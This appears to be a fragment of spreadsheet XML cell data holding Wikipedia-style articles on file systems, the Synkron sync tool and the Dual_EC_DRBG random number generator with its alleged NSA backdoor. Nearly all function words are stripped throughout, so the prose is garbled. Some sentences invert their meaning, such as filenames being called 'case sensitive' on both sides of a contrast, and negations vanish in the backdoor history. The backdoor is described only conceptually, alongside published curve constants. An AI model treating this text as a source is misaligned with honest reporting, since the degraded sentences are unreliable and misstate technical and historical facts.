partition table (gpt) master boot record (mbr) references external links sleuth international journal digital evidence dublin city university security forensics wiki wiki thinkpad users</t>
  </si>
  <si>
    <t>File system</t>
  </si>
  <si>
    <t>computing, file system filesystem (often abbreviated method data structure operating system uses control data stored retrieved. without file system, data placed storage medium would large body data tell piece data stopped next began, piece data located time retrieve separating data pieces giving piece name, data easily isolated identified. taking name paper-based data management system named, group data called "file". structure logic rules used manage groups data names called "file system." there many kinds file systems, unique structure logic, properties speed, flexibility, security, size more. some file systems designed used specific applications. example, 9660 file system designed specifically optical discs. file systems used many types storage devices using various media. 2019, hard disk drives storage devices projected remain foreseeable future. other kinds media used include ssds, magnetic tapes, optical discs. cases, tmpfs, computer's main memory (random-access memory, ram) used create temporary file system short-term use. some file systems used local data storage devices; others provide file access network protocol (for example, nfs, smb, clients). some file systems "virtual", meaning supplied "files" (called virtual files) computed request (such procfs sysfs) merely mapping different file system used backing store. file system manages access content files metadata files. responsible arranging storage space; reliability, efficiency, tuning regard physical storage medium important design considerations. origin term before advent computers term file system used describe method storing retrieving paper documents. 1961, term applied computerized filing alongside original meaning. 1964, general use. architecture file system consists three layers. sometimes layers explicitly separated, sometimes functions combined.the logical file system responsible interaction user application. provides application program interface (api) file operations open, close, read, etc., passes requested operation layer processing. logical file system "manage[s] open file table entries per-process file descriptors". this layer provides "file access, directory operations, [and] security protection".the second optional layer virtual file system. "this interface allows support multiple concurrent instances physical file systems, called file system implementation".the third layer physical file system. this layer concerned physical operation storage device (e.g. disk). processes physical blocks read written. handles buffering memory management responsible physical placement blocks specific locations storage medium. physical file system interacts device drivers channel drive storage device. aspects file systems space management note: applies file systems used storage devices. file systems allocate space granular manner, usually multiple physical units device. file system responsible organizing files directories, keeping track areas media belong file used. example, apple early 1980s, 256-byte sectors kilobyte floppy disk used track/sector map.this results unused space file exact multiple allocation unit, sometimes referred slack space. 512-byte allocation, average unused space bytes. clusters, average unused space size allocation unit chosen file system created. choosing allocation size based average size files expected file system minimize amount unusable space. frequently default allocation provide reasonable usage. choosing allocation size small results excessive overhead file system contain mostly large files. file system fragmentation occurs unused space single files contiguous. file system used, files created, modified deleted. when file created, file system allocates space data. some file systems permit require specifying initial space allocation subsequent incremental allocations file grows. files deleted, space allocated eventually considered available files. this creates alternating used unused areas various sizes. this free space fragmentation. when file created area contiguous space available initial allocation, space must assigned fragments. when file modified becomes larger, exceed space initially allocated another allocation must assigned elsewhere file becomes fragmented.in operating systems, system administrator disk quotas limit allocation disk space. filenames filename file name) used identify storage location file system. most file systems restrictions length filenames. file systems, filenames case sensitive (i.e., names myfile myfile refer file directory); others, filenames case sensitive (i.e., names myfile, myfile, myfile refer three separate files directory). most modern file systems allow filenames contain wide range characters unicode character set. however, restrictions certain special characters, disallowing within filenames; characters might used indicate device, device type, directory prefix, file path separator, file type. directories file systems typically directories (also called folders) allow user group files separate collections. this implemented associating file name index table contents inode unix-like file system. directory structures flat (i.e. linear), allow hierarchies directories contain subdirectories. first file system support arbitrary hierarchies directories used multics operating system. native file systems unix-like systems also support arbitrary directory hierarchies, example, apple's hierarchical file system, successor hfs+ classic file system ms-dos later versions ms-dos microsoft windows, ntfs file system windows family operating systems, ods-2 (on-disk structure-2) higher levels files-11 file system openvms. metadata other bookkeeping information typically associated file within file system. length data contained file stored number blocks allocated file byte count. time file last modified stored file's timestamp. file systems might store file creation time, time last accessed, time file's metadata changed, time file last backed other information include file's device type (e.g. block, character, socket, subdirectory, etc.), owner user group access permissions file attributes (e.g. whether file read-only, executable, etc.). file system stores metadata associated file—including file name, length contents file, location file folder hierarchy—separate contents file. most file systems store names files directory place—the directory table directory—which often stored like file. many file systems metadata file directory table, rest metadata file completely separate structure, inode. most file systems also store metadata associated particular file. such metadata includes information unused regions—free space bitmap, block availability map—and information sectors. often information allocation group stored inside allocation group itself. additional attributes associated file systems, ntfs, xfs, ext2, ext3, versions ufs, hfs+, using extended file attributes. some file systems provide user defined attributes author document, character encoding document size image. some file systems allow different data collections associated file name. these separate collections referred streams forks. apple long used forked file system macintosh, microsoft supports streams ntfs. some file systems maintain multiple past revisions file single file name; filename retrieves recent version, prior saved version accessed using special naming convention "filename;4" "filename(-4)" access version four saves ago. comparison file systems#metadata details file systems support kinds metadata. file system abstract user interface cases, file system make storage device used organize represent access data, whether stored dynamically generated (e.g. procfs). utilities file systems include utilities initialize, alter parameters remove instance file system. some include ability extend truncate space allocated file system. directory utilities used create, rename delete directory entries, also known dentries (singular: dentry), alter metadata associated directory. directory utilities also include capabilities create additional links directory (hard links unix), rename parent links (".." unix-like operating systems), create bidirectional links files. file utilities create, list, copy, move delete files, alter metadata. they able truncate data, truncate extend space allocation, append move, modify files in-place. depending underlying structure file system, provide mechanism prepend truncate beginning file, insert entries middle file, delete entries file. utilities free space deleted files, file system provides undelete function, also belong category. some file systems defer operations reorganization free space, secure erasing free space, rebuilding hierarchical structures providing utilities perform functions times minimal activity. example file system defragmentation utilities. some important features file system utilities supervisory activities involve bypassing ownership direct access underlying device. these include high-performance backup recovery, data replication, reorganization various data structures allocation tables within file system. restricting permitting access there several mechanisms used file systems control access data. usually intent prevent reading modifying files user group users. another reason ensure data modified controlled access restricted specific program. examples include passwords stored metadata file elsewhere file permissions form permission bits, access control lists, capabilities. need file system utilities able access data media level reorganize structures provide efficient backup usually means effective polite users effective intruders. methods encrypting file data sometimes included file system. this effective since need file system utilities know encryption seed effectively manage data. risks relying encryption include fact attacker copy data brute force decrypt data. additionally, losing seed means losing data. maintaining integrity significant responsibility file system ensure file system structures secondary storage remain consistent, regardless actions programs accessing file system. this includes actions taken program modifying file system terminates abnormally neglects inform file system completed activities. this include updating metadata, directory entry handling data buffered updated physical storage media. other failures file system must deal include media failures loss connection remote systems. event operating system failure "soft" power failure, special routines file system must invoked similar individual program fails. file system must also able correct damaged structures. these occur result operating system failure unable notify file system, power failure, reset. file system must also record events allow analysis systemic issues well problems specific files directories. user data important purpose file system manage user data. this includes storing, retrieving updating data. some file systems accept data storage stream bytes collected stored manner efficient media. when program retrieves data, specifies size memory buffer file system transfers data media buffer. runtime library routine sometimes allow user program define record based library call specifying length. when user program reads data, library retrieves data file system returns record. some file systems allow specification fixed record length used writes reads. this facilitates locating record well updating records. identification record, also known key, makes sophisticated file system. user program read, write update records without regard location. this requires complicated management blocks media usually separating blocks data blocks. very efficient algorithms developed pyramid structures locating records. using file system utilities, language specific run-time libraries user programs file system apis make requests file system. these include data transfer, positioning, updating metadata, managing directories, managing access specifications, removal. multiple file systems within single system frequently, retail systems configured single file system occupying entire storage device. another approach partition disk several file systems different attributes used. file system, browser cache email storage, might configured small allocation size. this keeps activity creating deleting files typical browser activity narrow area disk interfere file allocations. another partition might created storage audio video files relatively large block size. another normally read-only periodically writable. third approach, mostly used cloud systems, "disk images" house additional file systems, attributes not, within another (host) file system file. common example virtualization: user experimental linux distribution (using ext4 file system) virtual machine his/her production windows environment (using ntfs). ext4 file system resides disk image, treated file multiple files, depending hypervisor settings) ntfs host file system. having multiple file systems single system additional benefit event corruption single partition, remaining file systems frequently still intact. this includes virus destruction system partition even system boot. file system utilities require dedicated access effectively completed piecemeal. addition, defragmentation effective. several system maintenance utilities, virus scans backups, also processed segments. example, necessary backup file system containing videos along files none added since last backup. image files, easily "spin off" differential images contain "new" data written master (original) image. differential images used safety concerns "disposable" system quickly restored destroyed contaminated virus, image removed image created matter seconds, even without automated procedures) quick virtual machine deployment (since differential images quickly spawned using script batches). design limitations file systems functional limit defines maximum storable data capacity within system. these functional limits best-guess effort designer based large storage systems right large storage systems likely become future. disk storage continued increase near exponential rates (see moore's law), years, file systems kept reaching design limitations require computer users repeatedly move newer system ever-greater capacity. file system complexity typically varies proportionally available storage capacity. file systems early 1980s home computers storage would reasonable choice modern storage systems hundreds gigabytes capacity. likewise, modern file systems would reasonable choice early systems, since complexity modern file system structures would quickly consume even exceed limited capacity early storage systems. types file systems file system types classified disk/tape file systems, network file systems special-purpose file systems. disk file systems disk file system takes advantages ability disk storage media randomly address data short amount time. additional considerations include speed accessing data following initially requested anticipation following data also requested. this permits multiple users processes) access various data disk without regard sequential location data. examples include (fat12, fat16, fat32), exfat, ntfs, hfs+, hpfs, apfs, ufs, ext2, ext3, ext4, xfs, btrfs, files-11, veritas file system, vmfs, zfs, reiserfs scoutfs. some disk file systems journaling file systems versioning file systems. optical discs 9660 universal disk format (udf) common formats target compact discs, dvds blu-ray discs. mount rainier extension supported since series linux kernel since windows vista facilitates rewriting dvds. flash file systems flash file system considers special abilities, performance restrictions flash memory devices. frequently disk file system flash memory device underlying storage media, much better file system specifically designed flash device. tape file systems tape file system file system tape format designed store files tape. magnetic tapes sequential storage media significantly longer random data access times disks, posing challenges creation efficient management general-purpose file system. disk file system typically master file directory, used free data regions. file additions, changes, removals require updating directory used/free maps. random access data regions measured milliseconds system works well disks. tape requires linear motion wind unwind potentially long reels media. this tape motion take several seconds several minutes move read/write head tape other. consequently, master file directory usage extremely slow inefficient tape. writing typically involves reading block usage find free blocks writing, updating usage directory data, advancing tape write data correct spot. each additional file write requires updating directory writing data, take several seconds occur file. tape file systems instead typically allow file directory spread across tape intermixed data, referred streaming, time-consuming repeated tape motions required write data. however, side effect design reading file directory tape usually requires scanning entire tape read scattered directory entries. most data archiving software works tape storage store local copy tape catalog disk file system, adding files tape done quickly without rescan tape media. local tape catalog copy usually discarded used specified period time, point tape must re-scanned used future. developed file system tape called linear tape file system. implementation file system released open-source linear tape file system single drive edition (ltfs-sde) product. linear tape file system uses separate partition tape record index meta-data, thereby avoiding problems associated scattering directory entries across entire tape. tape formatting writing data tape, erasing, formatting tape often significantly time-consuming process take several hours large tapes. with many data tape technologies necessary format tape over-writing data tape. this inherently destructive nature overwriting data sequential media. because time take format tape, typically tapes pre-formatted tape user need spend time preparing tape use. usually necessary write identifying media label tape use, even automatically written software tape used first time. database file systems another concept file management idea database-based file system. instead addition hierarchical structured management, files identified characteristics, like type file, topic, author, similar rich metadata.ibm (formerly known db2/400 i5/os) database file system part object based operating system (formerly known os/400 i5/os), incorporating single level store running power systems (formerly known as/400 iseries), designed frank soltis ibm's former chief scientist around 1978 1988 frank soltis team rochester successfully designed applied technologies like database file system others like microsoft later failed accomplish. these technologies informally known 'fortress rochester' basic aspects extended early mainframe technologies many ways advanced technological perspective. some projects "pure" database file systems aspects database file system: many content management systems relational dbms store retrieve files. example, xhtml files stored text fields, image files stored blob fields; select (with optional xpath) statements retrieve files, allow sophisticated logic rich information associations "usual file systems." many cmss also option storing metadata within database, standard filesystem used store content files. very large file systems, embodied applications like apache hadoop google file system, database file system concepts. transactional file systems some programs need either make multiple file system changes, changes fail reason, make none changes. example, program installing updating software write executables, libraries, and/or configuration files. writing fails software left partially installed updated, software broken unusable. incomplete update system utility, command shell, leave entire system unusable state. transaction processing introduces atomicity guarantee, ensuring operations inside transaction either committed transaction aborted system discards partial results. this means crash power failure, recovery, stored state consistent. either software completely installed failed installation completely rolled back, unusable partial install left system. transactions also provide isolation guarantee, meaning operations within transaction hidden threads system transaction commits, interfering operations system properly serialized transaction. windows, beginning vista, added transaction support ntfs, feature called transactional ntfs, discouraged. there number research prototypes transactional file systems unix systems, including valor file system, amino, lfs, transactional ext3 file system txos kernel, well transactional file systems targeting embedded systems, tffs.ensuring consistency across multiple file system operations difficult, impossible, without file system transactions. file locking used concurrency control mechanism individual files, typically protect directory structure file metadata. instance, file locking cannot prevent tocttou race conditions symbolic links. file locking also cannot automatically roll back failed operation, software upgrade; requires atomicity. journaling file systems technique used introduce transaction-level consistency file system structures. journal transactions exposed programs part api; used internally ensure consistency granularity single system call. data backup systems typically provide support direct backup data stored transactional manner, makes recovery reliable consistent data sets difficult. most backup software simply notes files changed since certain time, regardless transactional state shared across multiple files overall dataset. workaround, database systems simply produce archived state file containing data point, backup software backs interact directly active transactional databases all. recovery requires separate recreation database state file file restored backup software. network file systems network file system file system acts client remote file access protocol, providing access files server. programs using local interfaces transparently create, manage access hierarchical directories files remote network-connected computers. examples network file systems include clients nfs, afs, protocols, file-system-like clients webdav. shared disk file systems shared disk file system number machines (usually servers) access external disk subsystem (usually storage area network). file system arbitrates access subsystem, preventing write collisions. examples include gfs2 hat, gpfs, known spectrum scale, ibm, dataplow, cxfs sgi, stornext quantum corporation scoutfs versity. special file systems special file system presents non-file elements operating system files acted using file system apis. this commonly done unix-like operating systems, devices given file names non-unix-like operating systems well. device file systems device file system represents devices pseudo-devices files, called device files. examples unix-like systems include devfs and, linux systems, udev. non-unix-like systems, tops-10 operating systems influenced full filename pathname file include device prefix, devices containing file systems referred device prefix specifying device, without anything following other special file systems linux kernel, configfs sysfs provide files used query kernel information configure entities kernel. procfs maps processes and, linux, operating system structures filespace. minimal file system audio-cassette storage 1970s disk digital tape devices expensive early microcomputer users. inexpensive basic data storage system devised used common audio cassette tape. when system needed write data, user notified press "record" cassette recorder, press "return" keyboard notify system cassette recorder recording. system wrote sound provide time synchronization, modulated sounds encoded prefix, data, checksum suffix. when system needed read data, user instructed press "play" cassette recorder. system would listen sounds tape waiting burst sound could recognized synchronization. system would interpret subsequent sounds data. when data read complete, system would notify user press "stop" cassette recorder. primitive, (mostly) worked. data stored sequentially, usually unnamed format, although systems (such commodore series computers) allow files named. multiple sets data could written located fast-forwarding tape observing tape counter find approximate start next data region tape. user might listen sounds find right spot begin playing next data region. some implementations even included audible sounds interspersed data. flat file systems flat file system, subdirectories; directory entries files stored single directory. when floppy disk media first available type file system adequate relatively small amount data space available. cp/m machines featured flat file system, files could assigned user areas generic file operations narrowed work instead defaulting work them. these user areas special attributes associated files; necessary define specific quota areas files could added groups long still free storage space disk. early apple macintosh also featured flat file system, macintosh file system. unusual file management program (macintosh finder) created illusion partially hierarchical filing system emfs. this structure required every file unique name, even appeared separate folder. dos/360 os/360 store entries files disk pack (volume) directory pack called volume table contents (vtoc). while simple, flat file systems become awkward number files grows makes difficult organize data related groups files. recent addition flat file system family amazon's remote storage service, intentionally simplistic allow users ability customize data stored. constructs buckets (imagine disk drive unlimited size) objects (similar, identical standard concept file). advanced file management allowed able nearly character (including '/') object's name, ability select subsets bucket's content based identical prefixes. file systems operating systems many operating systems include support file system. sometimes file system tightly interwoven difficult separate file system functions. there needs interface provided operating system software user file system. this interface textual (such provided command line interface, unix shell, openvms dcl) graphical (such provided graphical user interface, file browsers). graphical, metaphor folder, containing documents, files, nested folders often used (see also: directory folder). unix unix-like operating systems unix-like operating systems create virtual file system, makes files devices appear exist single hierarchy. this means, systems, root directory, every file existing system located somewhere. unix-like systems disk network shared resource root directory. unix-like systems assign device name device, files device accessed. instead, gain access files another device, operating system must first informed directory tree files appear. this process called mounting file system. example, access files cd-rom, must tell operating system "take file system cd-rom make appear such-and-such directory." directory given operating system called mount point might, example, /media. /media directory exists many unix systems specified filesystem hierarchy standard) intended specifically mount point removable media cds, dvds, drives floppy disks. empty, contain subdirectories mounting individual devices. generally, administrator (i.e. root user) authorize mounting file systems. unix-like operating systems often include software tools assist mounting process provide functionality. some strategies coined "auto-mounting" reflection purpose. many situations, file systems root need available soon operating system booted. unix-like systems therefore provide facility mounting file systems boot time. system administrators define file systems configuration file fstab (vfstab solaris), also indicates options mount points. situations, need mount certain file systems boot time, although desired thereafter. there utilities unix-like systems allow mounting predefined file systems upon demand. removable media allow programs data transferred machines without physical connection. common examples include flash drives, cd-roms, dvds. utilities therefore developed detect presence availability medium mount medium without user intervention. progressive unix-like systems also introduced concept called supermounting; see, example, linux supermount-ng project. example, floppy disk supermounted physically removed system. under normal circumstances, disk synchronized unmounted removal. provided synchronization occurred, different disk inserted drive. system automatically notices disk changed updates mount point contents reflect medium. automounter automatically mount file system reference made directory atop mounted. this usually used file systems network servers, rather relying events insertion media, would appropriate removable media. linux linux supports numerous file systems, common choices system disk block device include ext* family (ext2, ext3 ext4), xfs, jfs, btrfs. flash without flash translation layer (ftl) memory technology device (mtd), ubifs, jffs2 yaffs, among others. squashfs common compressed read-only file system. solaris solaris earlier releases defaulted (non-journaled non-logging) bootable supplementary file systems. solaris defaulted supported, extended ufs. support file systems significant enhancements added time, including veritas software corp. (journaling) vxfs, microsystems (clustering) qfs, microsystems (journaling) ufs, microsystems (open source, poolable, compressible, error-correcting) zfs. kernel extensions added solaris allow bootable veritas vxfs operation. logging journaling added sun's solaris releases solaris solaris express, opensolaris, open source variants solaris operating system later supported bootable zfs. logical volume management allows spanning file system across multiple devices purpose adding redundancy, capacity, and/or throughput. legacy environments solaris solaris volume manager (formerly known solstice disksuite). multiple operating systems (including solaris) veritas volume manager. modern solaris based operating systems eclipse need volume management leveraging virtual storage pools zfs. macos macos (formerly uses apple file system (apfs), 2017 replaced file system inherited classic called plus (hfs+). apple also uses term "mac extended" hfs+. plus metadata-rich case-preserving (usually) case-insensitive file system. unix roots macos, unix permissions added plus. later versions plus added journaling prevent corruption file system structure introduced number optimizations allocation algorithms attempt defragment files automatically without requiring external defragmenter. filenames characters. plus uses unicode store filenames. macos, filetype come type code, stored file's metadata, filename extension. plus three kinds links: unix-style hard links, unix-style symbolic links, aliases. aliases designed maintain link original file even moved renamed; interpreted file system itself, file manager code userland. macos 10.13 high sierra, announced june 2017 apple's wwdc event, uses apple file system solid-state drives. macos also supported file system, derived unix fast file system nextstep. however, leopard, macos could longer installed volume, pre-leopard system installed volume upgraded leopard. lion support completely dropped. newer versions macos capable reading writing legacy file systems common windows. they also capable reading newer ntfs file systems windows. order write ntfs file systems macos versions prior snow leopard third party software necessary. 10.6 (snow leopard) later allow writing ntfs file systems, non-trivial system setting change (third party software exists automates this).finally, macos supports reading writing exfat file system since snow leopard, starting version 10.6.5. os/2 os/2 introduced high performance file system (hpfs). hpfs supports mixed case file names different code pages, long file names (255 characters), efficient disk space, architecture keeps related items close disk volume, less fragmentation data, extent-based space allocation, tree structure directories, root directory located midpoint disk, faster average access. journaled filesystem (jfs) shipped 1999. pc-bsd pc-bsd desktop version freebsd, inherits freebsd's support, similarly freenas. graphical installer pc-bsd handle (root) raid-z pool installs disk encryption using geli right start easy convenient (gui) way. current pc-bsd 9.0+ 'isotope edition' filesystem version storage pool version plan plan bell labs treats e</t>
  </si>
  <si>
    <t>Ssh</t>
  </si>
  <si>
    <t>Synkron</t>
  </si>
  <si>
    <t>synkron open-source multiplatform utility designed file synchronization folders, supporting synchs across computers. written uses libraries. synkron distributed terms apart carrying synchronisations, synkron provides features. user interface synkron divided several sections: synchronise, multisync, syncview, scheduler, restore, blacklist filters. user switch sections using toolbar. multisync supports synching multiple folders folder.synkron available portable app. installed software repositories major linux distributions. also comparison file hosting services comparison file synchronization software comparison online backup services references external links synkron's homepage</t>
  </si>
  <si>
    <t>Dual EC DRBG</t>
  </si>
  <si>
    <t>dual_ec_drbg (dual elliptic curve deterministic random generator) algorithm presented cryptographically secure pseudorandom number generator (csprng) using methods elliptic curve cryptography. despite wide public criticism, including public identification backdoor, seven years four csprngs standardized nist 800-90a originally published circa june 2006, withdrawn 2014. weakness: potential backdoor weaknesses cryptographic security algorithm known publicly criticised well algorithm became part formal standard endorsed ansi, iso, formerly national institute standards technology (nist). weaknesses publicly identified potential algorithm harbour kleptographic backdoor advantageous know it—the united states government's national security agency (nsa)—and else. 2013, york times reported documents possession never released public "appear confirm" backdoor real, deliberately inserted part bullrun decryption program. december 2013, reuters news article alleged 2004, nist standardized dual_ec_drbg, paid security million secret deal dual_ec_drbg default bsafe cryptography library, resulted security becoming important distributor insecure algorithm. responded "categorically deny" ever knowingly colluded adopt algorithm known flawed, saying never kept [our] relationship [with nsa] secret".sometime first known publication 2004, possible kleptographic backdoor discovered dual_ec_drbg's design, design dual_ec_drbg unusual property theoretically impossible anyone dual_ec_drbg's designers (nsa) confirm backdoor's existence. bruce schneier concluded shortly standardization "rather obvious" backdoor (along deficiencies) would mean nobody would dual_ec_drbg. backdoor would allow decrypt example ssl/tls encryption used dual_ec_drbg csprng.members ansi standard group, dual_ec_drbg first submitted, aware exact mechanism potential backdoor disable take sufficient steps unconditionally disable backdoor widely publicize general cryptographic community initially aware potential backdoor, shumow niels ferguson's publication, certicom's daniel brown scott vanstone's 2005 patent application describing backdoor mechanism. september 2013, york times reported internal memos leaked edward snowden indicated worked standardization process eventually become sole editor dual_ec_drbg standard, concluded dual_ec_drbg standard indeed contain backdoor nsa. response, nist stated "nist would deliberately weaken cryptographic standard." according york times story, spends $250 million year insert backdoors software hardware part bullrun program. presidential advisory committee subsequently examine nsa's conduct recommended among things government "fully support undermine efforts create encryption standards".on april 2014, nist withdrew dual_ec_drbg draft guidance random number generators recommending "current users dual_ec_drbg transition three remaining approved algorithms quickly possible." timeline dual_ec_drbg description overview algorithm uses single integer state. whenever random number requested, integer updated. k-th state given {\displaystyle s_{k}=g_{p}(s_{k-1})} returned random integer function state. k-th random number {\displaystyle r_{k}=g_{q}(s_{k})} function {\displaystyle g_{p}(x)} depends fixed elliptic curve point {\displaystyle g_{q}(x)} similar except uses point points stay constant particular implementation algorithm. details algorithm allows different constants, variable output length customization. simplicity, described constants curve p-256 (one sets constants available) fixed output length. algorithm operates exclusively prime finite field {\displaystyle f_{p}} {\displaystyle \mathbb /p\mathbb prime. state, seed random numbers elements field. field size 00000000 7179 632551 {\displaystyle p={\mathtt {ffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551}}_{16}} elliptic curve {\displaystyle f_{p}} given {\displaystyle y^{2}=x^{3}-3x+b} constant 55769886 2604 {\displaystyle b={\mathtt {5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b}}_{16}} points curve {\displaystyle e({\displaystyle f_{p}})} points given fixed points {\displaystyle p,q\in e(f_{p})} their coordinates 4247 77037 13945 3357 64068 97445 52018192 87058 81515 610046 {\displaystyle {\begin{aligned}p_{x}&amp;={\mathtt {6b17d1f2\ e12c4247\ f8bce6e5\ 63a440f2\ 77037d81\ 2deb33a0\ f4a13945\ d898c296}}_{~16}\\p_{y}&amp;={\mathtt {4fe342e2\ fe1a7f9b\ 8ee7eb4a\ 7c0f9e16\ 2bce3357\ 6b315ece\ cbb64068\ 37bf51f5}}_{~16}\\q_{x}&amp;={\mathtt {c97445f4\ 5cdef9f0\ d3e05e1e\ 585fc297\ 235b82b5\ be8ff3ef\ ca67c598\ 52018192}}_{~16}\\q_{y}&amp;={\mathtt {b28ef557\ ba31dfcb\ dd21ac46\ e2a91e3c\ 304f44cb\ 87058ada\ 2cb81515\ 1e610046}}_{~16}\end{aligned}}} function extract x-coordinate used. "converts" elliptic curve points elements field. {\displaystyle x(x,y)=x} output integers truncated output {\displaystyle t(x)=x\ {\text{mod}}\ {\frac {p}{2^{16}}}} functions {\displaystyle g_{p}} {\displaystyle g_{q}} these functions raise fixed points power. "raising power" context, means using special operation defined points elliptic curves. {\displaystyle g_{p}(x)=x(p^{x})} {\displaystyle g_{q}(x)=t(x(q^{x}))} generator seeded element {\displaystyle f_{p}} {\displaystyle s_{1}=g_{p}(seed)} k-th state random number {\displaystyle s_{k}=g_{p}(s_{k-1})} {\displaystyle r_{k}=g_{q}(s_{k})} random numbers {\displaystyle r_{1},r_{2},\ldots security stated purpose including dual_ec_drbg nist 800-90a security based computational hardness assumptions number theory. mathematical security reduction proof prove long number theoretical problems hard, random number generator secure. however, makers dual_ec_drbg publish security reduction dual_ec_drbg, shown soon nist draft published dual_ec_drbg indeed secure, output many bits round. output many bits (along carefully chosen elliptic curve points makes backdoor possible, enables attacker revert truncation brute force guessing. output many bits corrected final published standard, leaving dual_ec_drbg insecure backdoored.in many standards, constants meant arbitrary chosen nothing sleeve number principle, derived similar mathematical constants leaves little room adjustment. however, dual_ec_drbg specify default constants chosen, possibly constructed backdoored. because standard committee aware potential backdoor, implementer choose secure included. exact formulation standard written alleged backdoored required fips 140-2 validation, openssl project chose implement backdoored even though aware potential backdoor would preferred generating secure york times would later write worked standardization process eventually become sole editor standard.a security proof later published dual_ec_drbg daniel r.l. brown kristian gjøsteen, showing generated elliptic curve points would indistinguishable uniformly random elliptic curve points, fewer bits output final output truncation, elliptic curve points independent, dual_ec_drbg secure. proof relied assumption three problems hard: decisional diffie–hellman assumption (which generally accepted hard), newer less-known problems generally accepted hard: truncated point problem, x-logarithm problem. dual_ec_drbg quite slow compared many alternative csprngs (which security reductions), daniel r.l. brown argues security reduction makes slow dual_ec_drbg valid alternative (assuming implementors disable obvious backdoor). note daniel r.l. brown works certicom, main owner elliptic curve cryptography patents, conflict interest promoting csprng. alleged backdoor would allow attacker determine internal state random number generator looking output single round bytes); future output random number generator easily calculated, csprng reseeded external source randomness. this makes example ssl/tls vulnerable, since setup connection includes sending randomly generated cryptographic nonce clear. nsa's alleged backdoor would depend knowing single {\displaystyle eq=p} this hard problem ahead time, easier chosen. secret presumably known nsa, alleged backdoor kleptographic asymmetric hidden backdoor. matthew green's blog post many flaws dual_ec_drbg simplified explanation alleged backdoor works employing discrete-log kleptogram introduced crypto 1997. standardization implementations first introduced dual_ec_drbg ansi x9.82 drbg early 2000s, including parameters created alleged backdoor, dual_ec_drbg published draft ansi standard. dual_ec_drbg also exists 18031 standard.according john kelsey (who together elaine barker listed author nist 800-90a), possibility backdoor carefully chosen brought ansi x9f1 tool standards guidelines group meeting. when kelsey asked johnson cygnacom origin johnson answered october 2004 email kelsey prohibited public discussion generation alternative nsa-supplied one.at least members members ansi x9f1 tool standards guidelines group wrote ansi x9.82, daniel brown scott vanstone certicom, aware exact circumstances mechanism backdoor could occur, since filed patent application january 2005 exactly insert prevent backdoor dual_ec_drbg. working "trap door" mentioned patent identical later confirmed dual_ec_drbg. writing patent 2014, commentator matthew green describes patent "passive aggressive" spiting publicizing backdoor, still criticizing everybody committee actually disabling backdoor obviously aware brown vanstone's patent list necessary conditions backdoor exist: chosen elliptic curve random number generator avoids escrow keys choosing point elliptic curve verifiably random. intentional escrow keys provide back functionality. relationship used escrow stored security domain. administrator logs output generator reconstruct random number escrow key. small output truncation [0041] another alternative method preventing escrow attack output ecrng, shown figures truncation function ecrng truncate ecrng output approximately half length compressed elliptic curve point. preferably, operation done addition preferred method figure however, appreciated performed primary measure preventing escrow attack. benefit truncation list values associated single ecrng output typically infeasible search. example, 160-bit elliptic curve group, number potential points list 280, searching list would hard solving discrete logarithm problem. cost method ecrng made half efficient, output length effectively halved. according john kelsey, option standard choose verifiably random added option response suspected backdoor, though fips 140-2 validation could attained using possibly backdoored steve marquess (who helped implement nist 800-90a openssl) speculated requirement potentially backdoored points could evidence nist complicity. clear standard specify default standard verifyably generated nothing sleeve number, standard greater truncation, brown's patent said could used "primary measure preventing escrow attack". small truncation unusual compared previous prgs, according matthew green output bits output function. truncation 2006 shown gjøsteen make predictable therefore unusable csprng, even chosen contain backdoor. standard says implementations "should" small max_outlen provided, gives option outputting multiple fewer bits. appendix standard gives loose argument outputting fewer bits make output less uniformly distributed. brown's 2006 security proof relies outlen much smaller default max_outlen value standard. ansi x9f1 tool standards guidelines group discussed backdoor also included three employees prominent security company security. 2004, security made implementation dual_ec_drbg contained backdoor default csprng bsafe result secret million deal nsa. 2013, york times reported dual_ec_drbg contained backdoor nsa, security said aware backdoor made deal nsa, told customers switch csprng. 2014 conference keynote, security executive chairman coviello explained seen declining revenue encryption, decided stop "drivers" independent encryption research, instead "put trust behind" standards guidance standards organizations nist.a draft nist 800-90a including dual_ec_drbg published december 2005. final nist 800-90a including dual_ec_drbg published june 2006. documents leaked snowden interpreted suggesting backdoored dual_ec_drbg, making allegation citing nsa's work standardization process eventually become sole editor standard. early usage dual_ec_drbg security (for later reported secretly paid million) cited argument dual_ec_drbg's acceptance nist 800-90a standard. security subsequently cited dual_ec_drbg's acceptance nist standard reason used dual_ec_drbg.daniel brown's march 2006 paper security reduction dual_ec_drbg mentions need output truncation randomly chosen mostly passing, mention conclusions patent defects dual_ec_drbg together used backdoor. brown writes conclusion: "therefore, ecrng serious consideration, high efficiency makes suitable even constrained environments." note others criticised dual_ec_drbg extremely slow, bruce schneier concluding "it's slow anyone willingly it", matthew green saying dual_ec_drbg thousand times slower" alternatives. potential backdoor dual_ec_drbg widely publicised outside internal standard group meetings. shumow niels ferguson's 2007 presentation potential backdoor became widely known. shumow ferguson tasked implementing dual_ec_drbg microsoft, least furguson discussed possible backdoor 2005 meeting. bruce schneier wrote 2007 wired article dual_ec_drbg's flaws obvious nobody would dual_ec_drbg: makes sense trap door: it's public, rather obvious. makes sense engineering perspective: it's slow anyone willingly it." schneier apparently unaware security used dual_ec_drbg default bsafe since 2004. openssl implemented nist 800-90a including dual_ec_drbg request client. openssl developers aware potential backdoor shumow ferguson's presentation, wanted method included standard choose guarantied non-backdoored told fips 140-2 validation would default openssl chose implement dual_ec_drbg despite dubious reputation completeness, noting openssl tried complete implements many insecure algorithms. openssl dual_ec_drbg default csprng, discovered 2013 made openssl implementation dual_ec_drbg non-functioning, meaning could using it.bruce schneier reported december 2007 microsoft added dual_ec_drbg support windows vista, though enabled default, schneier warned known potential backdoor. windows later silently replace calls dual_ec_drbg calls ctr_drbg based aes.on september 2013, following snowden leak, york times report backdoor dual_ec_drbg, national institute standards technology (nist) announced light community security concerns, reissuing 800-90a draft standard, re-opening sp800-90b/c public comment. nist "strongly recommends" dual_ec_drbg, specified january 2012 version 800-90a. discovery backdoor nist standard major embarrassment nist.rsa security kept dual_ec_drbg default csprng bsafe even wider cryptographic community became aware potential backdoor 2007, seem general awareness bsafe's usage dual_ec_drbg user option community. only widespread concern backdoor effort find software used dual_ec_drbg, bsafe prominent found. after 2013 revelations, security chief technology curry provided technica rationale originally choosing flawed dual drbg standard default alternative random number generators. technical accuracy statement widely criticized cryptographers, including matthew green matt blaze. december 2013, reported reuters accepted secret payment million dual_ec_drbg random number generator default encryption products. december 2013, posted statement corporate blog "categorically" denying secret 